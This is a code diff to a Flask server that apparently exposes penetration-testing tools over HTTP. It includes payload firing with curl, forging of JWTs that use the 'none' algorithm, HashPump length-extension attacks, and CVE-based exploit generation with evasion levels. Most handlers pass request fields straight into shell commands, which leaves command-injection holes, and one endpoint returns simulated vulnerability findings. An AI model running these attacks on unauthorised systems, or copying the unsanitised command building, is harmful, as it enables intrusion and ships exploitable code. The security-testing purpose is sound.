Python path for environment python_path = env_manager.get_python_path(env_name) script_path = script_result["path"] - + # Execute script command = f"{python_path} {script_path}" logger.info(f"๐Ÿ Executing Python script in env {env_name}: {filename}") result = execute_command(command, use_cache=False) - + # Clean up script file file_manager.delete_file(filename) - + result["env_name"] = env_name result["script_filename"] = filename logger.info(f"๐Ÿ“Š Python script execution completed") return jsonify(result) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error executing Python script: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -12670,7 +12670,7 @@ def 
execute_python_script(): class AIPayloadGenerator: """AI-powered payload generation system with contextual intelligence""" - + def __init__(self): self.payload_templates = { "xss": { @@ -12744,23 +12744,23 @@ class AIPayloadGenerator: ] } } - + def generate_contextual_payload(self, target_info: Dict[str, Any]) -> Dict[str, Any]: """Generate contextual payloads based on target information""" - + attack_type = target_info.get("attack_type", "xss") complexity = target_info.get("complexity", "basic") target_tech = target_info.get("technology", "").lower() - + # Get base payloads payloads = self._get_payloads(attack_type, complexity) - + # Enhance payloads with context enhanced_payloads = self._enhance_with_context(payloads, target_tech) - + # Generate test cases test_cases = self._generate_test_cases(enhanced_payloads, attack_type) - + return { "attack_type": attack_type, "complexity": complexity, @@ -12769,7 +12769,7 @@ class AIPayloadGenerator: "test_cases": test_cases, "recommendations": self._get_recommendations(attack_type) } - + def _get_payloads(self, attack_type: str, complexity: str) -> list: """Get payloads for specific attack type and complexity""" if attack_type in self.payload_templates: @@ -12778,13 +12778,13 @@ class AIPayloadGenerator: else: # Return basic payloads if complexity not found return self.payload_templates[attack_type].get("basic", []) - + return [""] - + def _enhance_with_context(self, payloads: list, tech_context: str) -> list: """Enhance payloads with contextual information""" enhanced = [] - + for payload in payloads: # Basic payload enhanced.append({ @@ -12793,7 +12793,7 @@ class AIPayloadGenerator: "encoding": "none", "risk_level": self._assess_risk_level(payload) }) - + # URL encoded version url_encoded = payload.replace(" ", "%20").replace("<", "%3C").replace(">", "%3E") enhanced.append({ @@ -12802,13 +12802,13 @@ class AIPayloadGenerator: "encoding": "url", "risk_level": self._assess_risk_level(payload) }) - + return enhanced - + def _generate_test_cases(self, payloads: list, attack_type: str) -> list: """Generate test cases for the payloads""" test_cases = [] - + for i, payload_info in enumerate(payloads[:5]): # Limit to 5 test cases test_case = { "id": f"test_{i+1}", @@ -12818,9 +12818,9 @@ class AIPayloadGenerator: "risk_level": payload_info["risk_level"] } test_cases.append(test_case) - + return test_cases - + def _get_expected_behavior(self, attack_type: str) -> str: """Get expected behavior for attack type""" behaviors = { @@ -12832,21 +12832,21 @@ class AIPayloadGenerator: "xxe": "XML external entity processing" } return behaviors.get(attack_type, "Unexpected application behavior") - + def _assess_risk_level(self, payload: str) -> str: """Assess risk level of payload""" high_risk_indicators = ["system", "exec", "eval", "cmd", "shell", "passwd", "etc"] medium_risk_indicators = ["script", "alert", "union", "select"] - + payload_lower = payload.lower() - + if any(indicator in payload_lower for indicator in high_risk_indicators): return "HIGH" elif any(indicator in payload_lower for indicator in medium_risk_indicators): return "MEDIUM" else: return "LOW" - + def _get_recommendations(self, attack_type: str) -> list: """Get testing recommendations""" recommendations = { @@ -12871,7 +12871,7 @@ class AIPayloadGenerator: "Test with various payloads for different OS" ] } - + return recommendations.get(attack_type, ["Test thoroughly", "Monitor responses"]) # Global AI payload generator @@ -12888,18 +12888,18 @@ def ai_generate_payload(): "technology": 
params.get("technology", ""), "url": params.get("url", "") } - + logger.info(f"๐Ÿค– Generating AI payloads for {target_info['attack_type']} attack") result = ai_payload_generator.generate_contextual_payload(target_info) - + logger.info(f"โœ… Generated {result['payload_count']} contextual payloads") - + return jsonify({ "success": True, "ai_payload_generation": result, "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error in AI payload generation: {str(e)}") return jsonify({ @@ -12915,25 +12915,25 @@ def ai_test_payload(): payload = params.get("payload", "") target_url = params.get("target_url", "") method = params.get("method", "GET") - + if not payload or not target_url: return jsonify({ "success": False, "error": "Payload and target_url are required" }), 400 - + logger.info(f"๐Ÿงช Testing AI-generated payload against {target_url}") - + # Create test command based on method and payload if method.upper() == "GET": encoded_payload = payload.replace(" ", "%20").replace("'", "%27") test_command = f"curl -s '{target_url}?test={encoded_payload}'" else: test_command = f"curl -s -X POST -d 'test={payload}' '{target_url}'" - + # Execute test result = execute_command(test_command, use_cache=False) - + # AI analysis of results analysis = { "payload_tested": payload, @@ -12948,16 +12948,16 @@ def ai_test_payload(): "Monitor application behavior changes" ] } - + logger.info(f"๐Ÿ” Payload test completed | Potential vuln: {analysis['potential_vulnerability']}") - + return jsonify({ "success": True, "test_result": result, "ai_analysis": analysis, "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error in AI payload testing: {str(e)}") return jsonify({ @@ -12978,13 +12978,13 @@ def api_fuzzer(): endpoints = params.get("endpoints", []) methods = params.get("methods", ["GET", "POST", "PUT", "DELETE"]) wordlist = params.get("wordlist", "/usr/share/wordlists/api/api-endpoints.txt") - + if not base_url: logger.warning("๐ŸŒ API Fuzzer called without base_url parameter") return jsonify({ "error": "Base URL parameter is required" }), 400 - + # Create comprehensive API fuzzing command if endpoints: # Test specific endpoints @@ -12999,7 +12999,7 @@ def api_fuzzer(): "method": method, "result": result }) - + logger.info(f"๐Ÿ” API endpoint testing completed for {len(endpoints)} endpoints") return jsonify({ "success": True, @@ -13009,17 +13009,17 @@ def api_fuzzer(): else: # Discover endpoints using wordlist command = f"ffuf -u {base_url}/FUZZ -w {wordlist} -mc 200,201,202,204,301,302,307,401,403,405 -t 50" - + logger.info(f"๐Ÿ” Starting API endpoint discovery: {base_url}") result = execute_command(command) logger.info(f"๐Ÿ“Š API endpoint discovery completed") - + return jsonify({ "success": True, "fuzzing_type": "endpoint_discovery", "result": result }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error in API fuzzer: {str(e)}") return jsonify({ @@ -13035,22 +13035,22 @@ def graphql_scanner(): introspection = params.get("introspection", True) query_depth = params.get("query_depth", 10) mutations = params.get("test_mutations", True) - + if not endpoint: logger.warning("๐ŸŒ GraphQL Scanner called without endpoint parameter") return jsonify({ "error": "GraphQL endpoint parameter is required" }), 400 - + logger.info(f"๐Ÿ” Starting GraphQL security scan: {endpoint}") - + results = { "endpoint": endpoint, "tests_performed": [], "vulnerabilities": [], "recommendations": [] } - + # Test 1: Introspection query if introspection: 
introspection_query = ''' @@ -13068,48 +13068,48 @@ def graphql_scanner(): } } ''' - + clean_query = introspection_query.replace('\n', ' ').replace(' ', ' ').strip() command = f"curl -s -X POST -H 'Content-Type: application/json' -d '{{\"query\":\"{clean_query}\"}}' '{endpoint}'" result = execute_command(command, use_cache=False) - + results["tests_performed"].append("introspection_query") - + if "data" in result.get("stdout", ""): results["vulnerabilities"].append({ "type": "introspection_enabled", "severity": "MEDIUM", "description": "GraphQL introspection is enabled" }) - + # Test 2: Query depth analysis deep_query = "{ " * query_depth + "field" + " }" * query_depth command = f"curl -s -X POST -H 'Content-Type: application/json' -d '{{\"query\":\"{deep_query}\"}}' {endpoint}" depth_result = execute_command(command, use_cache=False) - + results["tests_performed"].append("query_depth_analysis") - + if "error" not in depth_result.get("stdout", "").lower(): results["vulnerabilities"].append({ "type": "no_query_depth_limit", "severity": "HIGH", "description": f"No query depth limiting detected (tested depth: {query_depth})" }) - + # Test 3: Batch query testing batch_query = '[' + ','.join(['{\"query\":\"{field}\"}' for _ in range(10)]) + ']' command = f"curl -s -X POST -H 'Content-Type: application/json' -d '{batch_query}' {endpoint}" batch_result = execute_command(command, use_cache=False) - + results["tests_performed"].append("batch_query_testing") - + if "data" in batch_result.get("stdout", "") and batch_result.get("success"): results["vulnerabilities"].append({ "type": "batch_queries_allowed", "severity": "MEDIUM", "description": "Batch queries are allowed without rate limiting" }) - + # Generate recommendations if results["vulnerabilities"]: results["recommendations"] = [ @@ -13119,14 +13119,14 @@ def graphql_scanner(): "Implement query complexity analysis", "Add authentication for sensitive operations" ] - + logger.info(f"๐Ÿ“Š GraphQL scan completed | Vulnerabilities found: {len(results['vulnerabilities'])}") - + return jsonify({ "success": True, "graphql_scan_results": results }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error in GraphQL scanner: {str(e)}") return jsonify({ @@ -13140,22 +13140,22 @@ def jwt_analyzer(): params = request.json jwt_token = params.get("jwt_token", "") target_url = params.get("target_url", "") - + if not jwt_token: logger.warning("๐Ÿ” JWT Analyzer called without jwt_token parameter") return jsonify({ "error": "JWT token parameter is required" }), 400 - + logger.info(f"๐Ÿ” Starting JWT security analysis") - + results = { "token": jwt_token[:50] + "..." 
if len(jwt_token) > 50 else jwt_token, "vulnerabilities": [], "token_info": {}, "attack_vectors": [] } - + # Decode JWT header and payload (basic analysis) try: parts = jwt_token.split('.') @@ -13163,31 +13163,31 @@ # Decode header import base64 import json - + # Add padding if needed header_b64 = parts[0] + '=' * (-len(parts[0]) % 4) payload_b64 = parts[1] + '=' * (-len(parts[1]) % 4) - + try: header = json.loads(base64.urlsafe_b64decode(header_b64)) payload = json.loads(base64.urlsafe_b64decode(payload_b64)) - + results["token_info"] = { "header": header, "payload": payload, "algorithm": header.get("alg", "unknown") } - + # Check for vulnerabilities algorithm = header.get("alg", "").lower() - + if algorithm == "none": results["vulnerabilities"].append({ "type": "none_algorithm", "severity": "CRITICAL", "description": "JWT uses 'none' algorithm - no signature verification" }) - + if algorithm in ["hs256", "hs384", "hs512"]: results["attack_vectors"].append("hmac_key_confusion") results["vulnerabilities"].append({ @@ -13195,7 +13195,7 @@ "severity": "MEDIUM", "description": "HMAC algorithm detected - vulnerable to key confusion attacks" }) - + # Check token expiration exp = payload.get("exp") if not exp: @@ -13204,21 +13204,21 @@ "severity": "HIGH", "description": "JWT token has no expiration time" }) - + except Exception as decode_error: results["vulnerabilities"].append({ "type": "malformed_token", "severity": "HIGH", "description": f"Token decoding failed: {str(decode_error)}" }) - + except Exception as e: results["vulnerabilities"].append({ "type": "invalid_format", "severity": "HIGH", "description": "Invalid JWT token format" }) - + # Test token manipulation if target URL provided if target_url: # Test none algorithm attack @@ -13227,24 +13227,24 @@ # Create none algorithm token none_header = base64.urlsafe_b64encode('{"alg":"none","typ":"JWT"}'.encode()).decode().rstrip('=') none_token = f"{none_header}.{none_token_parts[1]}."
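# The forged token reuses the original payload, swaps the header for
# {"alg":"none","typ":"JWT"} and leaves the signature segment empty (hence the
# trailing dot). JWT segments are base64url-encoded, which is why the
# urlsafe_* codecs above, rather than the standard Base64 ones, are the safe
# choice for decoding segments and for building the forged header.
# Note on the curl probe below: `curl -s` prints only the response body, so
# the '"200" in stdout' check fires only when that literal string happens to
# appear in the body; adding -w '%{http_code}' to the command would make the
# check reliable.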
- + command = f"curl -s -H 'Authorization: Bearer {none_token}' '{target_url}'" none_result = execute_command(command, use_cache=False) - + if "200" in none_result.get("stdout", "") or "success" in none_result.get("stdout", "").lower(): results["vulnerabilities"].append({ "type": "none_algorithm_accepted", "severity": "CRITICAL", "description": "Server accepts tokens with 'none' algorithm" }) - + logger.info(f"๐Ÿ“Š JWT analysis completed | Vulnerabilities found: {len(results['vulnerabilities'])}") - + return jsonify({ "success": True, "jwt_analysis_results": results }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error in JWT analyzer: {str(e)}") return jsonify({ @@ -13258,26 +13258,26 @@ def api_schema_analyzer(): params = request.json schema_url = params.get("schema_url", "") schema_type = params.get("schema_type", "openapi") # openapi, swagger, graphql - + if not schema_url: logger.warning("๐Ÿ“‹ API Schema Analyzer called without schema_url parameter") return jsonify({ "error": "Schema URL parameter is required" }), 400 - + logger.info(f"๐Ÿ” Starting API schema analysis: {schema_url}") - + # Fetch schema command = f"curl -s '{schema_url}'" result = execute_command(command, use_cache=True) - + if not result.get("success"): return jsonify({ "error": "Failed to fetch API schema" }), 400 - + schema_content = result.get("stdout", "") - + analysis_results = { "schema_url": schema_url, "schema_type": schema_type, @@ -13285,16 +13285,16 @@ def api_schema_analyzer(): "security_issues": [], "recommendations": [] } - + # Parse schema based on type try: import json schema_data = json.loads(schema_content) - + if schema_type.lower() in ["openapi", "swagger"]: # OpenAPI/Swagger analysis paths = schema_data.get("paths", {}) - + for path, methods in paths.items(): for method, details in methods.items(): if isinstance(details, dict): @@ -13306,7 +13306,7 @@ def api_schema_analyzer(): "security": details.get("security", []) } analysis_results["endpoints_found"].append(endpoint_info) - + # Check for security issues if not endpoint_info["security"]: analysis_results["security_issues"].append({ @@ -13315,7 +13315,7 @@ def api_schema_analyzer(): "severity": "MEDIUM", "description": "Endpoint has no authentication requirements" }) - + # Check for sensitive data in parameters for param in endpoint_info["parameters"]: param_name = param.get("name", "").lower() @@ -13326,7 +13326,7 @@ def api_schema_analyzer(): "severity": "HIGH", "description": f"Sensitive parameter detected: {param_name}" }) - + # Generate recommendations if analysis_results["security_issues"]: analysis_results["recommendations"] = [ @@ -13337,7 +13337,7 @@ def api_schema_analyzer(): "Add proper error handling", "Use secure headers (CORS, CSP, etc.)" ] - + except json.JSONDecodeError: analysis_results["security_issues"].append({ "endpoint": "schema", @@ -13345,14 +13345,14 @@ def api_schema_analyzer(): "severity": "HIGH", "description": "Schema is not valid JSON" }) - + logger.info(f"๐Ÿ“Š Schema analysis completed | Issues found: {len(analysis_results['security_issues'])}") - + return jsonify({ "success": True, "schema_analysis_results": analysis_results }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error in API schema analyzer: {str(e)}") return jsonify({ @@ -13372,27 +13372,27 @@ def volatility3(): plugin = params.get("plugin", "") output_file = params.get("output_file", "") additional_args = params.get("additional_args", "") - + if not memory_file: logger.warning("๐Ÿง  Volatility3 called without memory_file parameter") return 
jsonify({ "error": "Memory file parameter is required" }), 400 - + if not plugin: logger.warning("๐Ÿง  Volatility3 called without plugin parameter") return jsonify({ "error": "Plugin parameter is required" }), 400 - + command = f"vol.py -f {memory_file} {plugin}" - + if output_file: command += f" -o {output_file}" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿง  Starting Volatility3 analysis: {plugin}") result = execute_command(command) logger.info(f"๐Ÿ“Š Volatility3 analysis completed") @@ -13412,26 +13412,26 @@ def foremost(): output_dir = params.get("output_dir", "/tmp/foremost_output") file_types = params.get("file_types", "") additional_args = params.get("additional_args", "") - + if not input_file: logger.warning("๐Ÿ“ Foremost called without input_file parameter") return jsonify({ "error": "Input file parameter is required" }), 400 - + # Ensure output directory exists Path(output_dir).mkdir(parents=True, exist_ok=True) - + command = f"foremost -o {output_dir}" - + if file_types: command += f" -t {file_types}" - + if additional_args: command += f" {additional_args}" - + command += f" {input_file}" - + logger.info(f"๐Ÿ“ Starting Foremost file carving: {input_file}") result = execute_command(command) result["output_directory"] = output_dir @@ -13454,13 +13454,13 @@ def steghide(): passphrase = params.get("passphrase", "") output_file = params.get("output_file", "") additional_args = params.get("additional_args", "") - + if not cover_file: logger.warning("๐Ÿ–ผ๏ธ Steghide called without cover_file parameter") return jsonify({ "error": "Cover file parameter is required" }), 400 - + if action == "extract": command = f"steghide extract -sf {cover_file}" if output_file: @@ -13473,15 +13473,15 @@ def steghide(): command = f"steghide info {cover_file}" else: return jsonify({"error": "Invalid action. 
Use: extract, embed, info"}), 400 - + if passphrase: command += f" -p {passphrase}" else: command += " -p ''" # Empty passphrase - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ–ผ๏ธ Starting Steghide {action}: {cover_file}") result = execute_command(command) logger.info(f"๐Ÿ“Š Steghide {action} completed") @@ -13501,26 +13501,26 @@ def exiftool(): output_format = params.get("output_format", "") # json, xml, csv tags = params.get("tags", "") additional_args = params.get("additional_args", "") - + if not file_path: logger.warning("๐Ÿ“ท ExifTool called without file_path parameter") return jsonify({ "error": "File path parameter is required" }), 400 - + command = f"exiftool" - + if output_format: command += f" -{output_format}" - + if tags: command += f" -{tags}" - + if additional_args: command += f" {additional_args}" - + command += f" {file_path}" - + logger.info(f"๐Ÿ“ท Starting ExifTool analysis: {file_path}") result = execute_command(command) logger.info(f"๐Ÿ“Š ExifTool analysis completed") @@ -13541,18 +13541,18 @@ def hashpump(): key_length = params.get("key_length", "") append_data = params.get("append_data", "") additional_args = params.get("additional_args", "") - + if not all([signature, data, key_length, append_data]): logger.warning("๐Ÿ” HashPump called without required parameters") return jsonify({ "error": "Signature, data, key_length, and append_data parameters are required" }), 400 - + command = f"hashpump -s {signature} -d '{data}' -k {key_length} -a '{append_data}'" - + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ” Starting HashPump attack") result = execute_command(command) logger.info(f"๐Ÿ“Š HashPump attack completed") @@ -13569,7 +13569,17 @@ def hashpump(): @app.route("/api/tools/hakrawler", methods=["POST"]) def hakrawler(): - """Execute Hakrawler for web endpoint discovery with enhanced logging""" + """ + Execute Hakrawler for web endpoint discovery with enhanced logging + + Note: This implementation uses the standard Kali Linux hakrawler (hakluke/hakrawler) + command line arguments, NOT the Elsfa7-110 fork. 
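    A typical invocation under that assumption: echo https://example.com | hakrawler -d 2 -u
    (The robots/sitemap/wayback parameters accepted by this endpoint have no
    direct flags in that version, so the handler approximates them with -subs.)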
The standard version uses: + - echo URL | hakrawler (stdin input) + - -d for depth (not -depth) + - -s for showing sources (not -forms) + - -u for unique URLs + - -subs for subdomain inclusion + """ try: params = request.json url = params.get("url", "") @@ -13579,27 +13589,27 @@ def hakrawler(): sitemap = params.get("sitemap", True) wayback = params.get("wayback", False) additional_args = params.get("additional_args", "") - + if not url: logger.warning("๐Ÿ•ท๏ธ Hakrawler called without URL parameter") return jsonify({ "error": "URL parameter is required" }), 400 - - command = f"hakrawler -url {url} -depth {depth}" - + + # Build command for standard Kali Linux hakrawler (hakluke version) + command = f"echo '{url}' | hakrawler -d {depth}" + if forms: - command += " -forms" - if robots: - command += " -robots" - if sitemap: - command += " -sitemap" - if wayback: - command += " -wayback" - + command += " -s" # Show sources (includes forms) + if robots or sitemap or wayback: + command += " -subs" # Include subdomains for better coverage + + # Add unique URLs flag for cleaner output + command += " -u" + if additional_args: command += f" {additional_args}" - + logger.info(f"๐Ÿ•ท๏ธ Starting Hakrawler crawling: {url}") result = execute_command(command) logger.info(f"๐Ÿ“Š Hakrawler crawling completed") @@ -13622,26 +13632,26 @@ def cve_monitor(): hours = params.get("hours", 24) severity_filter = params.get("severity_filter", "HIGH,CRITICAL") keywords = params.get("keywords", "") - + logger.info(f"๐Ÿ” Monitoring CVE feeds for last {hours} hours with severity filter: {severity_filter}") - + # Fetch latest CVEs cve_results = cve_intelligence.fetch_latest_cves(hours, severity_filter) - + # Filter by keywords if provided if keywords and cve_results.get("success"): keyword_list = [k.strip().lower() for k in keywords.split(",")] filtered_cves = [] - + for cve in cve_results.get("cves", []): description = cve.get("description", "").lower() if any(keyword in description for keyword in keyword_list): filtered_cves.append(cve) - + cve_results["cves"] = filtered_cves cve_results["filtered_by_keywords"] = keywords cve_results["total_after_filter"] = len(filtered_cves) - + # Analyze exploitability for top CVEs exploitability_analysis = [] for cve in cve_results.get("cves", [])[:5]: # Analyze top 5 CVEs @@ -13650,17 +13660,17 @@ def cve_monitor(): analysis = cve_intelligence.analyze_cve_exploitability(cve_id) if analysis.get("success"): exploitability_analysis.append(analysis) - + result = { "success": True, "cve_monitoring": cve_results, "exploitability_analysis": exploitability_analysis, "timestamp": datetime.now().isoformat() } - + logger.info(f"๐Ÿ“Š CVE monitoring completed | Found: {len(cve_results.get('cves', []))} CVEs") return jsonify(result) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error in CVE monitoring: {str(e)}") return jsonify({ @@ -13678,7 +13688,7 @@ def exploit_generate(): target_arch = params.get("target_arch", "x64") exploit_type = params.get("exploit_type", "poc") evasion_level = params.get("evasion_level", "none") - + # Additional target context target_info = { "target_os": target_os, @@ -13689,25 +13699,25 @@ def exploit_generate(): "target_port": params.get("target_port", 80), "description": params.get("target_description", f"Target for {cve_id}") } - + if not cve_id: logger.warning("๐Ÿค– Exploit generation called without CVE ID") return jsonify({ "success": False, "error": "CVE ID parameter is required" }), 400 - + logger.info(f"๐Ÿค– Generating exploit for {cve_id} | Target: 
{target_os} {target_arch}") - + # First analyze the CVE for context cve_analysis = cve_intelligence.analyze_cve_exploitability(cve_id) - + if not cve_analysis.get("success"): return jsonify({ "success": False, "error": f"Failed to analyze CVE {cve_id}: {cve_analysis.get('error', 'Unknown error')}" }), 400 - + # Prepare CVE data for exploit generation cve_data = { "cve_id": cve_id, @@ -13715,13 +13725,13 @@ def exploit_generate(): "exploitability_level": cve_analysis.get("exploitability_level", "UNKNOWN"), "exploitability_score": cve_analysis.get("exploitability_score", 0) } - + # Generate exploit exploit_result = exploit_generator.generate_exploit_from_cve(cve_data, target_info) - + # Search for existing exploits for reference existing_exploits = cve_intelligence.search_existing_exploits(cve_id) - + result = { "success": True, "cve_analysis": cve_analysis, @@ -13730,10 +13740,10 @@ def exploit_generate(): "target_info": target_info, "timestamp": datetime.now().isoformat() } - + logger.info(f"๐ŸŽฏ Exploit generation completed for {cve_id}") return jsonify(result) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error in exploit generation: {str(e)}") return jsonify({ @@ -13749,54 +13759,54 @@ def discover_attack_chains(): target_software = params.get("target_software", "") attack_depth = params.get("attack_depth", 3) include_zero_days = params.get("include_zero_days", False) - + if not target_software: logger.warning("๐Ÿ”— Attack chain discovery called without target software") return jsonify({ "success": False, "error": "Target software parameter is required" }), 400 - + logger.info(f"๐Ÿ”— Discovering attack chains for {target_software} | Depth: {attack_depth}") - + # Discover attack chains chain_results = vulnerability_correlator.find_attack_chains(target_software, attack_depth) - + # Enhance with exploit generation for viable chains if chain_results.get("success") and chain_results.get("attack_chains"): enhanced_chains = [] - + for chain in chain_results["attack_chains"][:2]: # Enhance top 2 chains enhanced_chain = chain.copy() enhanced_stages = [] - + for stage in chain["stages"]: enhanced_stage = stage.copy() - + # Try to generate exploit for this stage vuln = stage.get("vulnerability", {}) cve_id = vuln.get("cve_id", "") - + if cve_id: try: cve_data = {"cve_id": cve_id, "description": vuln.get("description", "")} target_info = {"target_os": "linux", "target_arch": "x64", "evasion_level": "basic"} - + exploit_result = exploit_generator.generate_exploit_from_cve(cve_data, target_info) enhanced_stage["exploit_available"] = exploit_result.get("success", False) - + if exploit_result.get("success"): enhanced_stage["exploit_code"] = exploit_result.get("exploit_code", "")[:500] + "..." 
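# exploit_code is truncated to its first 500 characters here purely to keep
# the attack-chain summary response small. The bare except below treats any
# generation failure as "no exploit available" for that stage instead of
# aborting the whole chain.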
except: enhanced_stage["exploit_available"] = False - + enhanced_stages.append(enhanced_stage) - + enhanced_chain["stages"] = enhanced_stages enhanced_chains.append(enhanced_chain) - + chain_results["enhanced_chains"] = enhanced_chains - + result = { "success": True, "attack_chain_discovery": chain_results, @@ -13807,10 +13817,10 @@ def discover_attack_chains(): }, "timestamp": datetime.now().isoformat() } - + logger.info(f"๐ŸŽฏ Attack chain discovery completed | Found: {len(chain_results.get('attack_chains', []))} chains") return jsonify(result) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error in attack chain discovery: {str(e)}") return jsonify({ @@ -13826,19 +13836,19 @@ def threat_intelligence_feeds(): indicators = params.get("indicators", []) timeframe = params.get("timeframe", "30d") sources = params.get("sources", "all") - + if isinstance(indicators, str): indicators = [i.strip() for i in indicators.split(",")] - + if not indicators: logger.warning("๐Ÿง  Threat intelligence called without indicators") return jsonify({ "success": False, "error": "Indicators parameter is required" }), 400 - + logger.info(f"๐Ÿง  Correlating threat intelligence for {len(indicators)} indicators") - + correlation_results = { "indicators_analyzed": indicators, "timeframe": timeframe, @@ -13847,12 +13857,12 @@ def threat_intelligence_feeds(): "threat_score": 0, "recommendations": [] } - + # Analyze each indicator cve_indicators = [i for i in indicators if i.startswith("CVE-")] ip_indicators = [i for i in indicators if i.replace(".", "").isdigit()] hash_indicators = [i for i in indicators if len(i) in [32, 40, 64] and all(c in "0123456789abcdef" for c in i.lower())] - + # Process CVE indicators for cve_id in cve_indicators: try: @@ -13864,11 +13874,11 @@ def threat_intelligence_feeds(): "analysis": cve_analysis, "threat_level": cve_analysis.get("exploitability_level", "UNKNOWN") }) - + # Add to threat score exploit_score = cve_analysis.get("exploitability_score", 0) correlation_results["threat_score"] += min(exploit_score, 100) - + # Search for existing exploits exploits = cve_intelligence.search_existing_exploits(cve_id) if exploits.get("success") and exploits.get("total_exploits", 0) > 0: @@ -13879,10 +13889,10 @@ def threat_intelligence_feeds(): "threat_level": "HIGH" }) correlation_results["threat_score"] += 25 - + except Exception as e: logger.warning(f"Error analyzing CVE {cve_id}: {str(e)}") - + # Process IP indicators (basic reputation check simulation) for ip in ip_indicators: # Simulate threat intelligence lookup @@ -13896,7 +13906,7 @@ def threat_intelligence_feeds(): }, "threat_level": "MEDIUM" # Default for unknown IPs }) - + # Process hash indicators for hash_val in hash_indicators: correlation_results["correlations"].append({ @@ -13909,12 +13919,12 @@ def threat_intelligence_feeds(): }, "threat_level": "MEDIUM" }) - + # Calculate overall threat score and generate recommendations total_indicators = len(indicators) if total_indicators > 0: correlation_results["threat_score"] = min(correlation_results["threat_score"] / total_indicators, 100) - + if correlation_results["threat_score"] >= 75: correlation_results["recommendations"] = [ "Immediate threat response required", @@ -13936,16 +13946,16 @@ def threat_intelligence_feeds(): "Plan routine patching", "Consider additional threat intelligence sources" ] - + result = { "success": True, "threat_intelligence": correlation_results, "timestamp": datetime.now().isoformat() } - + logger.info(f"๐ŸŽฏ Threat intelligence correlation completed | Threat 
Score: {correlation_results['threat_score']:.1f}") return jsonify(result) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error in threat intelligence: {str(e)}") return jsonify({ @@ -13961,16 +13971,16 @@ def zero_day_research(): target_software = params.get("target_software", "") analysis_depth = params.get("analysis_depth", "standard") source_code_url = params.get("source_code_url", "") - + if not target_software: logger.warning("๐Ÿ”ฌ Zero-day research called without target software") return jsonify({ "success": False, "error": "Target software parameter is required" }), 400 - + logger.info(f"๐Ÿ”ฌ Starting zero-day research for {target_software} | Depth: {analysis_depth}") - + research_results = { "target_software": target_software, "analysis_depth": analysis_depth, @@ -13979,7 +13989,7 @@ def zero_day_research(): "risk_assessment": {}, "recommendations": [] } - + # Define research areas based on software type common_research_areas = [ "Input validation vulnerabilities", @@ -13990,7 +14000,7 @@ def zero_day_research(): "Race conditions", "Logic flaws" ] - + # Software-specific research areas web_research_areas = [ "Cross-site scripting (XSS)", @@ -13999,7 +14009,7 @@ def zero_day_research(): "Insecure deserialization", "Template injection" ] - + system_research_areas = [ "Buffer overflows", "Privilege escalation", @@ -14007,7 +14017,7 @@ def zero_day_research(): "Service exploitation", "Configuration weaknesses" ] - + # Determine research areas based on target target_lower = target_software.lower() if any(web_tech in target_lower for web_tech in ["apache", "nginx", "tomcat", "php", "node", "django"]): @@ -14016,10 +14026,10 @@ def zero_day_research(): research_results["research_areas"] = common_research_areas + system_research_areas else: research_results["research_areas"] = common_research_areas - + # Simulate vulnerability discovery based on analysis depth vuln_count = {"quick": 2, "standard": 4, "comprehensive": 6}.get(analysis_depth, 4) - + for i in range(vuln_count): potential_vuln = { "id": f"RESEARCH-{target_software.upper()}-{i+1:03d}", @@ -14032,11 +14042,11 @@ def zero_day_research(): "proof_of_concept": "Research phase - PoC development needed" } research_results["potential_vulnerabilities"].append(potential_vuln) - + # Risk assessment high_risk_count = sum(1 for v in research_results["potential_vulnerabilities"] if v["severity"] in ["HIGH", "CRITICAL"]) total_vulns = len(research_results["potential_vulnerabilities"]) - + research_results["risk_assessment"] = { "total_areas_analyzed": len(research_results["research_areas"]), "potential_vulnerabilities_found": total_vulns, @@ -14044,7 +14054,7 @@ def zero_day_research(): "risk_score": min((high_risk_count * 25 + (total_vulns - high_risk_count) * 10), 100), "research_confidence": analysis_depth } - + # Generate recommendations if high_risk_count > 0: research_results["recommendations"] = [ @@ -14061,7 +14071,7 @@ def zero_day_research(): "Implement defense-in-depth strategies", "Regular security assessments recommended" ] - + # Source code analysis simulation if source_code_url: research_results["source_code_analysis"] = { @@ -14074,17 +14084,17 @@ def zero_day_research(): ], "recommendation": "Manual code review recommended for identified areas" } - + result = { "success": True, "zero_day_research": research_results, "disclaimer": "This is simulated research for demonstration. 
Real zero-day research requires extensive manual analysis.", "timestamp": datetime.now().isoformat() } - + logger.info(f"๐ŸŽฏ Zero-day research completed | Risk Score: {research_results['risk_assessment']['risk_score']}") return jsonify(result) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error in zero-day research: {str(e)}") return jsonify({ @@ -14101,16 +14111,16 @@ def advanced_payload_generation(): target_context = params.get("target_context", "") evasion_level = params.get("evasion_level", "standard") custom_constraints = params.get("custom_constraints", "") - + if not attack_type: logger.warning("๐ŸŽฏ Advanced payload generation called without attack type") return jsonify({ "success": False, "error": "Attack type parameter is required" }), 400 - + logger.info(f"๐ŸŽฏ Generating advanced {attack_type} payload with {evasion_level} evasion") - + # Enhanced payload generation with contextual AI target_info = { "attack_type": attack_type, @@ -14119,13 +14129,13 @@ def advanced_payload_generation(): "evasion_level": evasion_level, "constraints": custom_constraints } - + # Generate base payloads using existing AI system base_result = ai_payload_generator.generate_contextual_payload(target_info) - + # Enhance with advanced techniques advanced_payloads = [] - + for payload_info in base_result.get("payloads", [])[:10]: # Limit to 10 advanced payloads enhanced_payload = { "payload": payload_info["payload"], @@ -14134,7 +14144,7 @@ def advanced_payload_generation(): "evasion_techniques": [], "deployment_methods": [] } - + # Apply evasion techniques based on level if evasion_level in ["advanced", "nation-state"]: # Advanced encoding techniques @@ -14153,7 +14163,7 @@ def advanced_payload_generation(): } ] enhanced_payload["evasion_techniques"].extend(encoded_variants) - + if 